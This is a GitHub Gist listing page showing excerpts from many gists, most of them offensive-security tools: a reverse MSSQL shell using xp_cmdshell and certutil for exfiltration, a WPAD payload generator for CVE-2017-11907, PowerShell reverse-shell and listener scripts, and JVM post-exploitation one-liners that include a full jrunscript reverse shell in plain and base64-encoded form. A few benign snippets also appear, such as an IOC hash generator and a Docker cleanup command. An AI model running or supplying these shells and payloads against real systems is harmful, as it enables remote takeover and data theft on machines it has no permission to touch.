Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
I may be slow to respond.

sasqwatch

💭
I may be slow to respond.
View GitHub Profile
@MSAdministrator
MSAdministrator / iranian_apit_groups_possible_commands.md
Last active May 7, 2021
Iranian APT Groups & Possible Commands Used By These Groups
View iranian_apit_groups_possible_commands.md

Overview

The following content is generated using a preview release of Swimlane's pyattck.

This snippet of data is scoped to the following actor groups:

  • APT33
  • APT34
  • APT39
  • Charming Kitten
@xassiz
xassiz / mandros.py
Created Mar 16, 2018
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@jthuraisamy
jthuraisamy / README.md
Last active Sep 25, 2019
CVE-2017-11907 WPAD.dat Generator for Responder
View README.md

Usage

This script generates a payload for use with Responder.

  1. Generate a payload with main.py
  2. Copy and paste the one-liner output into the WPADScript field of Responder.conf.
test@test:~$ python3 main.py --help
usage: main.py [-h] [-o OUT] cmd
@staaldraad
staaldraad / receivefile.ps1
Created Feb 24, 2017
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 192.168.1.7 8080```
View receivefile.ps1
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
@msuiche
msuiche / ioc-generator.ps1
Created Jan 13, 2017
PowerShell IOCs generator
View ioc-generator.ps1
dir . | Foreach-Object{
$file = $_
$hash = Get-FileHash $file -Algorithm MD5
$fileinfo = Get-Item $file
New-Object -TypeName PSObject -Property @{
VersionInfo = $fileinfo.VersionInfo
LastWriteTime = $fileinfo.LastWriteTime
Length = $fileinfo.Length
Algorithm = $hash.Algorithm
@Zenexer
Zenexer / escapeshellrce.md
Last active Mar 15, 2021
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
View escapeshellrce.md

Paul Buonopane paul@namepros.com at NamePros
PGP: https://keybase.io/zenexer

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.

Summary

@staaldraad
staaldraad / mini-reverse.ps1
Created Oct 3, 2016
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
@staaldraad
staaldraad / mini-reverse-listener.ps1
Created Oct 3, 2016
A reverse shell listener in powershell
View mini-reverse-listener.ps1
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413);
if($socket -eq $null){
exit 1
}
$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active Aug 14, 2020
JVM Post-Exploitation One-Liners
View JVM_POST_EXPLOIT.md

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@evanscottgray
evanscottgray / docker_kill.sh
Last active May 9, 2021
kill all docker containers at once...
View docker_kill.sh
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt